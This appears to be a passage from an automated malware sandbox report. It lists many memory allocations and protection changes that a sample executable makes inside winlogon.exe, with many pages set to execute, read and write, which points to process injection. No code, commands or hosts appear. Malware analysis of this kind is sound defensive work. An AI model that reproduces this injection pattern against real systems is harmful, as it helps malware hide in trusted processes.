Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D332000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D334000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D336000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D341000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D352000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D354000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D356000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page no access
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D361000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D372000 protect: page read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory allocated: C:\Windows\System32\winlogon.exe base: D374000 protect: page read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: 400000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: 401000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: 412000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: 414000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: 416000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C940000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C941000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C952000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C954000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C956000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C960000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C961000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C972000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C974000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C976000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C980000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C981000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C992000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C994000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C996000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9B2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9B4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9D2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9D4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9F2000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9F4000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: C9F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA00000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA01000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA12000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA14000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA16000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA20000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA21000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA32000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA34000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA36000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA40000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA41000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA52000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA54000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA56000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA60000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA61000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA72000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA74000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA76000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA80000 protect: page readonly
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA81000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA92000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe  Memory protected: C:\Windows\System32\winlogon.exe base: CA94000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page execute and read and writeJump to behavior
